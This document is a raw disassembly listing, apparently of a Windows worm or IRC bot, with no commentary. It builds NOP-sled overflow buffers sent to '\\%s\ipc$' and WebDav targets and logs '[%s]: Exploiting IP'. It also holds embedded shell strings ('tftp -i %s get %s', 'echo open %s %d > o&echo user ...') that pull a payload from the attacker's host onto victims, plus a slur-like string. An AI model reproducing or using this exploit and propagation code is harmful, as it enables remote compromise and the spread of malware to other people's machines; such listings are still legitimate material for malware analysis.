sub_41167C proc near ; CODE XREF: sub_4115E8+53�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, [ebp+arg_0]
inc dword ptr [esi]
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], 1
xor ebx, ebx
jmp short loc_4116AB
; ---------------------------------------------------------------------------
loc_411696: ; CODE XREF: sub_41167C+35�j
mov cl, [eax]
cmp cl, 3Fh
jz short loc_4116A7
cmp cl, 2Ah
jnz short loc_4116B3
cmp cl, 3Fh
jnz short loc_4116A9
loc_4116A7: ; CODE XREF: sub_41167C+1F�j
inc dword ptr [edi]
loc_4116A9: ; CODE XREF: sub_41167C+29�j
inc dword ptr [esi]
loc_4116AB: ; CODE XREF: sub_41167C+18�j
mov ecx, [edi]
cmp [ecx], bl
mov eax, [esi]
jnz short loc_411696
loc_4116B3: ; CODE XREF: sub_41167C+24�j
cmp byte ptr [eax], 2Ah
jnz short loc_4116C2
loc_4116B8: ; CODE XREF: sub_41167C+44�j
inc eax
mov ecx, eax
mov [esi], eax
cmp byte ptr [ecx], 2Ah
jz short loc_4116B8
loc_4116C2: ; CODE XREF: sub_41167C+3A�j
mov ecx, [edi]
mov dl, [ecx]
cmp dl, bl
jnz short loc_4116DF
cmp [eax], bl
jz short loc_4116D2
xor eax, eax
jmp short loc_411744
; ---------------------------------------------------------------------------
loc_4116D2: ; CODE XREF: sub_41167C+50�j
cmp dl, bl
jnz short loc_4116DF
cmp [eax], bl
jnz short loc_4116DF
xor eax, eax
inc eax
jmp short loc_411744
; ---------------------------------------------------------------------------
loc_4116DF: ; CODE XREF: sub_41167C+4C�j
; sub_41167C+58�j ...
push ecx
push eax
call sub_4115E8
test eax, eax
pop ecx
pop ecx
jnz short loc_41172E
loc_4116EC: ; CODE XREF: sub_41167C+B0�j
inc dword ptr [edi]
mov ecx, [esi]
mov eax, [edi]
mov cl, [ecx]
cmp cl, [eax]
jz short loc_411710
loc_4116F8: ; CODE XREF: sub_41167C+92�j
mov ecx, [esi]
cmp byte ptr [ecx], 5Bh
jz short loc_411710
cmp [eax], bl
jz short loc_411725
inc eax
mov [edi], eax
mov ecx, [esi]
mov cl, [ecx]
mov edx, eax
cmp cl, [edx]
jnz short loc_4116F8
loc_411710: ; CODE XREF: sub_41167C+7A�j
; sub_41167C+81�j
cmp [eax], bl
jz short loc_411725
push eax
push dword ptr [esi]
call sub_4115E8
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
jmp short loc_41172A
; ---------------------------------------------------------------------------
loc_411725: ; CODE XREF: sub_41167C+85�j
; sub_41167C+96�j
mov [ebp+var_4], ebx
xor eax, eax
loc_41172A: ; CODE XREF: sub_41167C+A7�j
cmp eax, ebx
jnz short loc_4116EC
loc_41172E: ; CODE XREF: sub_41167C+6E�j
mov eax, [edi]
cmp [eax], bl
jnz short loc_411741
mov eax, [esi]
cmp [eax], bl
jnz short loc_411741
mov [ebp+var_4], 1
loc_411741: ; CODE XREF: sub_41167C+B6�j
; sub_41167C+BC�j
mov eax, [ebp+var_4]
loc_411744: ; CODE XREF: sub_41167C+54�j
; sub_41167C+61�j
pop edi
pop esi
pop ebx
leave
retn
sub_41167C endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 3D4h
and dword ptr [ebp-10h], 0
push ebx
push esi
push edi
mov esi, offset dword_427540
lea edi, [ebp-24h]
movsd
movsd
movsd
movsd
push 15Bh
movsw
mov dword ptr [ebp-44h], 6741A1CDh
mov dword ptr [ebp-40h], 6741A199h
mov dword ptr [ebp-3Ch], 6741A426h
mov dword ptr [ebp-38h], 67419E1Dh
mov dword ptr [ebp-34h], 67419CE8h
mov dword ptr [ebp-30h], 0FFB7DE9h
mov dword ptr [ebp-2Ch], 0FFB832Fh
call sub_41344D
pop ecx
mov edi, eax
mov [ebp-4], edi
push 56h
xor eax, eax
pop ecx
rep stosd
stosw
stosb
mov ecx, [ebp-4]
mov edi, ecx
lea esi, [ebp-24h]
movsd
movsd
movsd
movsd
add ecx, 11h
movsw
mov edi, ecx
mov [ebp-28h], ecx
dec edi
loc_4117C9: ; CODE XREF: .text:004117CF�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_4117C9
mov esi, offset loc_42753C
movsw
movsb
mov edi, ecx
dec edi
loc_4117DC: ; CODE XREF: .text:004117E2�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_4117DC
mov esi, offset aNilsisgay ; "NILSISGAY!!"
movsd
push 6
movsd
push 1
push 2
movsd
call dword_4334A0
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_411A26
and dword ptr [ebp-8], 0
lea esi, [ebp-44h]
mov [ebp-0Ch], esi
loc_41180D: ; CODE XREF: .text:004119B1�j
xor eax, eax
lea edi, [ebp-24h]
stosd
stosd
stosd
stosd
lea eax, [ebp+0Ch]
push eax
mov word ptr [ebp-24h], 2
call dword_433514
push dword ptr [ebp+12Ch]
mov [ebp-20h], eax
call dword_4335EC
mov [ebp-22h], ax
push 10h
lea eax, [ebp-24h]
push eax
push ebx
call dword_433458
cmp eax, 0FFFFFFFFh
jz loc_41199D
mov edi, [ebp-28h]
not dword ptr [esi]
push 4
push esi
push edi
call sub_412A80
mov eax, offset loc_42A1D0
add esp, 0Ch
mov ecx, eax
loc_411867: ; CODE XREF: .text:0041186C�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_411867
sub eax, ecx
mov esi, ecx
dec edi
loc_411873: ; CODE XREF: .text:00411879�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_411873
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
lea eax, [ebp-4]
rep movsb
lea ecx, [eax+1]
loc_41188F: ; CODE XREF: .text:00411894�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41188F
push 0
sub eax, ecx
push eax
lea eax, [ebp-4]
push eax
push ebx
call dword_433534
test eax, eax
jz loc_41199A
mov esi, ds:dword_41F000
push 3E8h
call esi
push ebx
call dword_4335AC
xor eax, eax
lea edi, [ebp-24h]
stosd
stosd
stosd
stosd
lea eax, [ebp+0Ch]
push eax
mov word ptr [ebp-24h], 2
call dword_433514
push 7BDh
mov [ebp-20h], eax
call dword_4335EC
mov [ebp-22h], ax
push 10h
lea eax, [ebp-24h]
push eax
push ebx
call dword_433458
test eax, eax
jz loc_41199A
mov eax, offset byte_42AED0
push eax
push eax
push dword ptr [ebp+8]
call sub_406C33
pop ecx
push eax
push offset aTftpISGetS ; "tftp -i %s get %s\r\n"
mov edi, 190h
lea eax, [ebp-1D4h]
push edi
push eax
call sub_412E0D
add esp, 18h
push dword_432FF4
push dword ptr [ebp+8]
call sub_406C33
pop ecx
push eax
push offset aEchoOpenSDOEch ; "echo open %s %d > o&echo user 1 1 >> o "...
lea eax, [ebp-1D4h]
push edi
push eax
call sub_412E0D
add esp, 14h
push 0
add edi, 70h
push edi
lea eax, [ebp-3D4h]
push eax
push dword ptr [ebp+8]
call dword_433414
test eax, eax
jle short loc_41199A
push 1F4h
call esi
lea eax, [ebp-1D4h]
lea edx, [eax+1]
loc_41197C: ; CODE XREF: .text:00411981�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41197C
push 0
sub eax, edx
push eax
lea eax, [ebp-1D4h]
push eax
push ebx
call dword_433534
test eax, eax
jg short loc_4119B9
loc_41199A: ; CODE XREF: .text:004118A8�j
; .text:004118FC�j ...
mov esi, [ebp-0Ch]
loc_41199D: ; CODE XREF: .text:00411849�j
push ebx
call dword_4335AC
inc dword ptr [ebp-8]
add esi, 4
cmp dword ptr [ebp-8], 7
mov [ebp-0Ch], esi
jb loc_41180D
jmp short loc_411A26
; ---------------------------------------------------------------------------
loc_4119B9: ; CODE XREF: .text:00411998�j
push ebx
call dword_4335AC
lea eax, [ebp+0Ch]
push eax
mov eax, [ebp+134h]
imul eax, 3Ch
add eax, offset aWebdav_0 ; "WebDav"
push eax
push offset aSExploitingIpS ; "[%s]: Exploiting IP: %s."
lea eax, [ebp-3D4h]
push edi
push eax
mov dword ptr [ebp-10h], 1
call sub_412E0D
add esp, 14h
cmp dword ptr [ebp+140h], 0
jnz short loc_411A19
push 0
push dword ptr [ebp+13Ch]
lea eax, [ebp-3D4h]
push eax
lea eax, [ebp+0A0h]
push eax
push dword ptr [ebp+8]
call sub_4045DD
add esp, 14h
loc_411A19: ; CODE XREF: .text:004119F6�j
lea eax, [ebp-3D4h]
push eax
call sub_401C33
pop ecx
loc_411A26: ; CODE XREF: .text:004117FD�j
; .text:004119B7�j
mov eax, [ebp-10h]
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411A2E proc near ; CODE XREF: sub_411B71+3F8�p
var_5A4 = byte ptr -5A4h
var_1A4 = byte ptr -1A4h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_4 = byte ptr 0Ch
arg_14 = byte ptr 1Ch
arg_94 = dword ptr 9Ch
push ebp
mov ebp, esp
sub esp, 5A4h
push ebx
push esi
push edi
xor eax, eax
lea edi, [ebp+var_14]
stosd
stosd
stosd
stosd
lea eax, [ebp+arg_4]
push eax
mov [ebp+var_14], 2
call dword_433514
mov [ebp+var_10], eax
xor eax, eax
mov ax, word_42BDA0
push eax
call dword_4335EC
xor ebx, ebx
push ebx
push 1
push 2
mov [ebp+var_12], ax
call dword_4334A0
mov esi, eax
cmp esi, 0FFFFFFFFh
mov [ebp+var_4], esi
jnz short loc_411A87
xor al, al
jmp loc_411B6C
; ---------------------------------------------------------------------------
loc_411A87: ; CODE XREF: sub_411A2E+50�j
push 10h
lea eax, [ebp+var_14]
push eax
push esi
call dword_433458
cmp eax, 0FFFFFFFFh
jz loc_411B61
push ebx
mov edi, 400h
push edi
lea eax, [ebp+var_5A4]
push eax
push esi
call dword_433414
push [ebp+arg_94]
lea eax, [ebp+arg_14]
push eax
push offset aEchoOpenSDOE_0 ; "echo open %s %d>o&echo USER a>>o&echo a"...
mov esi, 190h
lea eax, [ebp+var_1A4]
push esi
push eax
call sub_412E0D
lea eax, [ebp+var_1A4]
add esp, 14h
lea ecx, [eax+1]
loc_411ADF: ; CODE XREF: sub_411A2E+B6�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_411ADF
push ebx
sub eax, ecx
push eax
lea eax, [ebp+var_1A4]
push eax
push [ebp+var_4]
call dword_433534
cmp eax, 0FFFFFFFFh
jz short loc_411B61
push 1F4h
call ds:dword_41F000
push offset byte_42AED0
push offset aS_4 ; "%s\r\n"
lea eax, [ebp+var_1A4]
push esi
push eax
call sub_412E0D
lea eax, [ebp+var_1A4]
add esp, 10h
lea edx, [eax+1]
loc_411B2D: ; CODE XREF: sub_411A2E+104�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_411B2D
push ebx
sub eax, edx
push eax
lea eax, [ebp+var_1A4]
push eax
push [ebp+var_4]
call dword_433534
cmp eax, 0FFFFFFFFh
jz short loc_411B61
push ebx
push edi
lea eax, [ebp+var_5A4]
push eax
push [ebp+var_4]
call dword_433414
mov bl, 1
loc_411B61: ; CODE XREF: sub_411A2E+69�j
; sub_411A2E+CF�j ...
push [ebp+var_4]
call dword_4335AC
mov al, bl
loc_411B6C: ; CODE XREF: sub_411A2E+54�j
pop edi
pop esi
pop ebx
leave
retn
sub_411A2E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411B71 proc near ; CODE XREF: .text:00412098�p
; .text:004120BA�p
var_81DC = byte ptr -81DCh
var_8174 = byte ptr -8174h
var_6104 = byte ptr -6104h
var_6094 = byte ptr -6094h
var_55D0 = byte ptr -55D0h
var_402C = byte ptr -402Ch
var_402B = byte ptr -402Bh
var_2F98 = byte ptr -2F98h
var_24D4 = byte ptr -24D4h
var_24D3 = byte ptr -24D3h
var_24D0 = byte ptr -24D0h
var_2454 = byte ptr -2454h
var_1C84 = byte ptr -1C84h
var_17D9 = byte ptr -17D9h
var_14EC = byte ptr -14ECh
var_EAC = byte ptr -0EACh
var_8D0 = byte ptr -8D0h
var_830 = byte ptr -830h
var_6C8 = dword ptr -6C8h
var_6B8 = byte ptr -6B8h
var_394 = dword ptr -394h
var_390 = dword ptr -390h
var_384 = byte ptr -384h
var_124 = dword ptr -124h
var_114 = byte ptr -114h
var_FC = byte ptr -0FCh
var_FB = byte ptr -0FBh
var_AC = byte ptr -0ACh
var_A9 = byte ptr -0A9h
var_7F = byte ptr -7Fh
var_7D = byte ptr -7Dh
var_7C = byte ptr -7Ch
var_34 = byte ptr -34h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = byte ptr 8
arg_4 = byte ptr 0Ch
arg_140 = dword ptr 148h
arg_144 = dword ptr 14Ch
push ebp
mov ebp, esp
mov eax, 81DCh
call sub_412DD0
mov eax, ds:dword_4275EC
push ebx
mov [ebp+var_C], eax
mov eax, ds:dword_4275F0
push esi
mov [ebp+var_8], eax
push edi
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_34]
push offset aSIpc ; "\\\\%s\\ipc$"
push eax
call sub_412BB5
add esp, 0Ch
xor eax, eax
loc_411BA8: ; CODE XREF: sub_411B71+4E�j
mov cl, [ebp+eax+var_34]
and [ebp+eax*2+var_FB], 0
mov [ebp+eax*2+var_FC], cl
inc eax
cmp eax, 28h
jl short loc_411BA8
push 18h
pop ecx
mov esi, offset dword_42B998
lea edi, [ebp+var_AC]
lea eax, [ebp+var_34]
rep movsd
lea edx, [eax+1]
loc_411BD7: ; CODE XREF: sub_411B71+6B�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_411BD7
sub eax, edx
mov ecx, eax
lea esi, [ebp+var_FC]
lea edi, [ebp+var_7C]
lea eax, [ebp+var_34]
rep movsw
lea ecx, [eax+1]
loc_411BF4: ; CODE XREF: sub_411B71+88�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_411BF4
sub eax, ecx
lea edi, [ebp+eax*2+var_7D]
mov esi, (offset aC_4+3)
movsd
movsd
lea eax, [ebp+var_34]
movsb
lea ecx, [eax+1]
loc_411C0F: ; CODE XREF: sub_411B71+A3�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_411C0F
sub eax, ecx
add al, 1Ah
shl al, 1
mov [ebp+var_1], al
mov [ebp+var_A9], al
lea eax, [ebp+var_34]
lea ecx, [eax+1]
loc_411C2B: ; CODE XREF: sub_411B71+BF�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_411C2B
sub eax, ecx
shl al, 1
add al, 9
mov [ebp+var_7F], al
xor eax, eax
mov ax, word_42BDA0
push eax
call dword_4335EC
xor eax, 9999h
cmp [ebp+arg_144], 0
mov word_42B690, ax
mov eax, 90909090h
jz loc_411D3D
mov ecx, 36Bh
lea edi, [ebp+var_EAC]
rep stosd
mov eax, [ebp+arg_144]
imul eax, 3Ch
mov edx, dword_42BDE0[eax]
mov eax, offset loc_42B5E0
mov ecx, eax
mov [ebp+var_6C8], edx
lea esi, [ecx+1]
loc_411C93: ; CODE XREF: sub_411B71+127�j
mov bl, [ecx]
inc ecx
test bl, bl
jnz short loc_411C93
sub ecx, esi
mov ebx, ecx
shr ecx, 2
mov esi, eax
lea edi, [ebp+var_6B8]
rep movsd
mov ecx, ebx
and ecx, 3
rep movsb
mov ecx, eax
mov [ebp+var_394], 6EB06EBh
mov [ebp+var_390], edx
lea esi, [ecx+1]
loc_411CC7: ; CODE XREF: sub_411B71+15B�j
mov dl, [ecx]
inc ecx
test dl, dl
jnz short loc_411CC7
sub ecx, esi
mov esi, eax
mov eax, ecx
shr ecx, 2
lea edi, [ebp+var_384]
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
xor eax, eax
loc_411CE8: ; CODE XREF: sub_411B71+193�j
mov cl, [ebp+eax+var_EAC]
and [ebp+eax*2+var_402B], 0
mov [ebp+eax*2+var_402C], cl
inc eax
cmp eax, 0DACh
jl short loc_411CE8
and [ebp+var_24D4], 0
and [ebp+var_24D3], 0
mov edx, 714h
mov ecx, edx
mov eax, 31313131h
lea edi, [ebp+var_81DC]
rep stosd
stosw
mov ecx, edx
mov eax, 31313131h
lea edi, [ebp+var_6104]
rep stosd
stosw
jmp short loc_411DA4
; ---------------------------------------------------------------------------
loc_411D3D: ; CODE XREF: sub_411B71+F0�j
mov ecx, 1F4h
lea edi, [ebp+var_8D0]
rep stosd
mov eax, offset loc_42B5E0
mov ecx, eax
lea esi, [ecx+1]
loc_411D54: ; CODE XREF: sub_411B71+1E8�j
mov dl, [ecx]
inc ecx
test dl, dl
jnz short loc_411D54
sub ecx, esi
mov esi, eax
mov eax, ecx
shr ecx, 2
lea edi, [ebp+var_830]
rep movsd
mov ecx, eax
and ecx, 3
lea eax, [ebp+var_C]
rep movsb
lea ecx, [eax+1]
loc_411D79: ; CODE XREF: sub_411B71+20D�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_411D79
sub eax, ecx
mov ecx, eax
shr ecx, 2
lea esi, [ebp+var_C]
lea edi, [ebp+var_114]
rep movsd
mov ecx, eax
mov eax, dword_42BDE0
and ecx, 3
rep movsb
mov [ebp+var_124], eax
loc_411DA4: ; CODE XREF: sub_411B71+1CA�j
mov esi, [ebp+arg_140]
mov ecx, 38Ah
mov eax, 31313131h
lea edi, [ebp+var_24D0]
rep stosd
stosb
movsx eax, [ebp+var_1]
push 0
add eax, 4
push eax
lea eax, [ebp+var_AC]
push eax
push esi
call dword_433534
cmp eax, 0FFFFFFFFh
jnz short loc_411DE1
loc_411DDA: ; CODE XREF: sub_411B71+29A�j
; sub_411B71+2C1�j ...
xor al, al
jmp loc_411F79
; ---------------------------------------------------------------------------
loc_411DE1: ; CODE XREF: sub_411B71+267�j
push 0
mov ebx, 640h
push ebx
lea eax, [ebp+var_14EC]
push eax
push esi
call dword_433414
xor edi, edi
push edi
push 68h
push offset dword_42BA00
push esi
call dword_433534
cmp eax, 0FFFFFFFFh
jz short loc_411DDA
push edi
push ebx
lea eax, [ebp+var_14EC]
push eax
push esi
call dword_433414
push edi
push 0A0h
push offset dword_42BA70
push esi
call dword_433534
cmp eax, 0FFFFFFFFh
jz short loc_411DDA
push edi
push ebx
lea eax, [ebp+var_14EC]
push eax
push esi
call dword_433414
cmp [ebp+arg_144], edi
jz loc_411EF1
push 1Ah
pop ecx
mov esi, offset dword_42BC30
lea edi, [ebp+var_81DC]
rep movsd
mov ecx, 6D6h
lea esi, [ebp+var_402C]
lea edi, [ebp+var_8174]
rep movsd
movsw
push 1Ch
pop ecx
mov esi, offset dword_42BCA0
lea edi, [ebp+var_6104]
rep movsd
mov ecx, 297h
lea esi, [ebp+var_2F98]
lea edi, [ebp+var_6094]
rep movsd
push 21h
movsw
pop ecx
mov esi, offset dword_42BD18
lea edi, [ebp+var_55D0]
rep movsd
xor esi, esi
push esi
push 10FCh
lea eax, [ebp+var_81DC]
push eax
push [ebp+arg_140]
call dword_433534
cmp eax, 0FFFFFFFFh
jz loc_411DDA
push esi
push ebx
lea eax, [ebp+var_14EC]
push eax
push [ebp+arg_140]
call dword_433414
push esi
push 0FDCh
lea eax, [ebp+var_6104]
jmp short loc_411F38
; ---------------------------------------------------------------------------
loc_411EF1: ; CODE XREF: sub_411B71+2D9�j
push 1Fh
pop ecx
mov esi, offset dword_42BB18
lea edi, [ebp+var_24D0]
rep movsd
push 24h
mov ecx, 1F4h
lea esi, [ebp+var_8D0]
lea edi, [ebp+var_2454]
rep movsd
pop ecx
mov esi, offset off_42BB98
lea edi, [ebp+var_1C84]
push 0
rep movsd
and [ebp+var_17D9], 0
push 0CF8h
lea eax, [ebp+var_24D0]
loc_411F38: ; CODE XREF: sub_411B71+37E�j
push eax
push [ebp+arg_140]
call dword_433534
cmp eax, 0FFFFFFFFh
jz loc_411DDA
push 12Ch
call ds:dword_41F000
sub esp, 140h
push 50h
pop ecx
lea esi, [ebp+arg_0]
mov edi, esp
rep movsd
call sub_411A2E
add esp, 140h
test al, al
setnz al
loc_411F79: ; CODE XREF: sub_411B71+26B�j
pop edi
pop esi
pop ebx
leave
retn
sub_411B71 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 854h
push ebx
push esi
push edi
xor eax, eax
lea edi, [ebp-14h]
stosd
stosd
stosd
stosd
lea eax, [ebp+0Ch]
xor esi, esi
push eax
mov [ebp-4], esi
mov word ptr [ebp-14h], 2
call dword_433514
push dword ptr [ebp+12Ch]
mov [ebp-10h], eax
call dword_4335EC
push 6
push 1
push 2
mov [ebp-12h], ax
call dword_4334A0
mov ebx, eax
or edi, 0FFFFFFFFh
cmp ebx, edi
jz loc_41207A
push 10h
lea eax, [ebp-14h]
push eax
push ebx
call dword_433458
cmp eax, edi
jz loc_412073
push esi
push 89h
push offset dword_42B778
push ebx
call dword_433534
cmp eax, edi
jz short loc_412073
push esi
mov esi, 640h
push esi
lea eax, [ebp-854h]
push eax
push ebx
call dword_433414
push 0
push 0A8h
push offset dword_42B808
push ebx
call dword_433534
cmp eax, edi
jz short loc_412073
push 0
push esi
lea eax, [ebp-854h]
push eax
push ebx
call dword_433414
push 0
push 0DEh
push offset dword_42B8B8
push ebx
call dword_433534
cmp eax, edi
jz short loc_412073
push 0
push esi
lea eax, [ebp-854h]
push eax
push ebx
call dword_433414
movsx eax, byte ptr [ebp-810h]
sub eax, 30h
jz short loc_412085
dec eax
jz short loc_412081
loc_412073: ; CODE XREF: .text:00411FE3�j
; .text:00411FFD�j ...
push ebx
call dword_4335AC
loc_41207A: ; CODE XREF: .text:00411FCE�j
xor eax, eax
jmp loc_412147
; ---------------------------------------------------------------------------
loc_412081: ; CODE XREF: .text:00412071�j
push 0
jmp short loc_4120A9
; ---------------------------------------------------------------------------
loc_412085: ; CODE XREF: .text:0041206E�j
push 2
push ebx
sub esp, 140h
push 50h
pop ecx
lea esi, [ebp+8]
mov edi, esp
rep movsd
call sub_411B71
add esp, 148h
test al, al
jnz short loc_4120C9
push 1
loc_4120A9: ; CODE XREF: .text:00412083�j
push ebx
sub esp, 140h
push 50h
pop ecx
lea esi, [ebp+8]
mov edi, esp
rep movsd
call sub_411B71
add esp, 148h
test al, al
jz short loc_4120D0
loc_4120C9: ; CODE XREF: .text:004120A5�j
mov dword ptr [ebp-4], 1
loc_4120D0: ; CODE XREF: .text:004120C7�j
push ebx
call dword_4335AC
cmp dword ptr [ebp-4], 0
jz short loc_412144
lea eax, [ebp+0Ch]
push eax
mov eax, [ebp+134h]
imul eax, 3Ch
add eax, offset aWebdav_0 ; "WebDav"
push eax
push offset aSExploitingIpS ; "[%s]: Exploiting IP: %s."
lea eax, [ebp-214h]
push 200h
push eax
call sub_412E0D
push 0
push dword ptr [ebp+13Ch]
lea eax, [ebp-214h]
push eax
lea eax, [ebp+0A0h]
push eax
push dword ptr [ebp+8]
call sub_4045DD
lea eax, [ebp-214h]
push eax
call sub_401C33
mov eax, [ebp+134h]
imul eax, 3Ch
lea eax, dword_42A070[eax]
add esp, 2Ch
inc dword ptr [eax]
loc_412144: ; CODE XREF: .text:004120DB�j
xor eax, eax
inc eax
loc_412147: ; CODE XREF: .text:0041207C�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, 8590h
call sub_412DD0
mov eax, ds:dword_4275EC
push ebx
push esi
mov [ebp-0Ch], eax
mov eax, ds:dword_4275F0
push edi
mov [ebp-8], eax
lea eax, [ebp+0Ch]
push 1
push eax
call sub_4028A8
test eax, eax
pop ecx
pop ecx
jz loc_412737
cmp eax, 1
jz loc_412737
cmp eax, 3
jnz short loc_412195
and dword ptr [ebp-10h], 0
jmp short loc_4121A9
; ---------------------------------------------------------------------------
loc_412195: ; CODE XREF: .text:0041218D�j
call sub_412D71
push 0Ah
cdq
pop ecx
idiv ecx
neg edx
sbb edx, edx
inc edx
inc edx
mov [ebp-10h], edx
loc_4121A9: ; CODE XREF: .text:00412193�j
lea eax, [ebp+0Ch]
push eax
push offset aSIpc ; "\\\\%s\\ipc$"
lea eax, [ebp-58h]
push 28h
push eax
call sub_412E0D
add esp, 10h
xor eax, eax
loc_4121C2: ; CODE XREF: .text:004121D9�j
mov cl, [ebp+eax-58h]
and byte ptr [ebp+eax*2-11Fh], 0
mov [ebp+eax*2-120h], cl
inc eax
cmp eax, 28h
jl short loc_4121C2
push 18h
pop ecx
mov esi, offset dword_42C250
lea edi, [ebp-0D0h]
lea eax, [ebp-58h]
rep movsd
lea edx, [eax+1]
loc_4121F1: ; CODE XREF: .text:004121F6�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4121F1
sub eax, edx
mov ecx, eax
lea esi, [ebp-120h]
lea edi, [ebp-0A0h]
lea eax, [ebp-58h]
rep movsw
lea ecx, [eax+1]
loc_412211: ; CODE XREF: .text:00412216�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_412211
sub eax, ecx
lea edi, [ebp+eax*2-0A1h]
mov esi, (offset aC_5+3)
movsd
movsd
lea eax, [ebp-58h]
movsb
lea ecx, [eax+1]
loc_41222F: ; CODE XREF: .text:00412234�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41222F
sub eax, ecx
add al, 1Ah
shl al, 1
mov [ebp-1], al
mov [ebp-0CDh], al
lea eax, [ebp-58h]
lea ecx, [eax+1]
loc_41224B: ; CODE XREF: .text:00412250�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41224B
sub eax, ecx
shl al, 1
add al, 9
push 135h
mov [ebp-0A3h], al
call dword_4335EC
mov ebx, [ebp-10h]
xor eax, 9999h
cmp ebx, 1
mov word_42BF48, ax
jz short loc_4122F6
cmp ebx, 2
jz short loc_4122F6
mov eax, 90909090h
mov ecx, 1F4h
lea edi, [ebp-12C4h]
rep stosd
mov eax, offset loc_42BE98
mov ecx, eax
lea esi, [ecx+1]
loc_41229D: ; CODE XREF: .text:004122A2�j
mov dl, [ecx]
inc ecx
test dl, dl
jnz short loc_41229D
sub ecx, esi
mov esi, eax
mov eax, ecx
shr ecx, 2
lea edi, [ebp-1224h]
rep movsd
mov ecx, eax
and ecx, 3
lea eax, [ebp-0Ch]
rep movsb
lea ecx, [eax+1]
loc_4122C2: ; CODE XREF: .text:004122C7�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4122C2
sub eax, ecx
mov ecx, eax
shr ecx, 2
lea esi, [ebp-0Ch]
lea edi, [ebp-0B08h]
rep movsd
mov ecx, eax
and ecx, 3
imul ebx, 3Ch
mov eax, dword_42C690[ebx]
rep movsb
mov [ebp-0B18h], eax
jmp loc_4123C8
; ---------------------------------------------------------------------------
loc_4122F6: ; CODE XREF: .text:0041227A�j
; .text:0041227F�j
imul ebx, 3Ch
mov edx, dword_42C690[ebx]
mov eax, 90909090h
mov ecx, 36Bh
lea edi, [ebp-18A0h]
rep stosd
mov eax, offset loc_42BE98
mov ecx, eax
mov [ebp-10BCh], edx
lea esi, [ecx+1]
loc_412321: ; CODE XREF: .text:00412326�j
mov bl, [ecx]
inc ecx
test bl, bl
jnz short loc_412321
sub ecx, esi
mov ebx, ecx
shr ecx, 2
mov esi, eax
lea edi, [ebp-10ACh]
rep movsd
mov ecx, ebx
and ecx, 3
rep movsb
mov ecx, eax
mov dword ptr [ebp-0D88h], 6EB06EBh
mov [ebp-0D84h], edx
lea esi, [ecx+1]
loc_412355: ; CODE XREF: .text:0041235A�j
mov dl, [ecx]
inc ecx
test dl, dl
jnz short loc_412355
sub ecx, esi
mov esi, eax
mov eax, ecx
shr ecx, 2
lea edi, [ebp-0D78h]
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
xor eax, eax
loc_412376: ; CODE XREF: .text:00412392�j
mov cl, [ebp+eax-18A0h]
and byte ptr [ebp+eax*2-43DFh], 0
mov [ebp+eax*2-43E0h], cl
inc eax
cmp eax, 0DACh
jl short loc_412376
and byte ptr [ebp-2888h], 0
and byte ptr [ebp-2887h], 0
mov edx, 714h
mov esi, 31313131h
mov ecx, edx
mov eax, esi
lea edi, [ebp-8590h]
rep stosd
stosw
mov ecx, edx
mov eax, esi
lea edi, [ebp-64B8h]
rep stosd
stosw
loc_4123C8: ; CODE XREF: .text:004122F1�j
mov ecx, 38Ah
mov eax, 31313131h
lea edi, [ebp-2884h]
rep stosd
xor ebx, ebx
push ebx
push 1
push 2
stosb
call dword_4334A0
mov esi, eax
xor eax, eax
cmp esi, 0FFFFFFFFh
mov [ebp-8], esi
jz loc_412739
push dword ptr [ebp+12Ch]
lea edi, [ebp-30h]
stosd
stosd
stosd
stosd
mov word ptr [ebp-30h], 2
call dword_4335EC
mov [ebp-2Eh], ax
lea eax, [ebp+0Ch]
push eax
call dword_433514
mov [ebp-2Ch], eax
push 10h
lea eax, [ebp-30h]
push eax
push esi
call dword_433458
cmp eax, 0FFFFFFFFh
jz loc_412730
push ebx
push 89h
push offset dword_42C030
push esi
call dword_433534
cmp eax, 0FFFFFFFFh
jz loc_412730
push ebx
mov ebx, 640h
push ebx
lea eax, [ebp-0AF0h]
push eax
push esi
call dword_433414
xor edi, edi
push edi
push 0A8h
push offset dword_42C0C0
push esi
call dword_433534
cmp eax, 0FFFFFFFFh
jz loc_412730
push edi
push ebx
lea eax, [ebp-0AF0h]
push eax
push esi
call dword_433414
push edi
push 0DEh
push offset dword_42C170
push esi
call dword_433534
cmp eax, 0FFFFFFFFh
jz loc_412730
push edi
push ebx
lea eax, [ebp-0AF0h]
push eax
push esi
call dword_433414
movsx eax, byte ptr [ebp-1]
push edi
add eax, 4
push eax
lea eax, [ebp-0D0h]
push eax
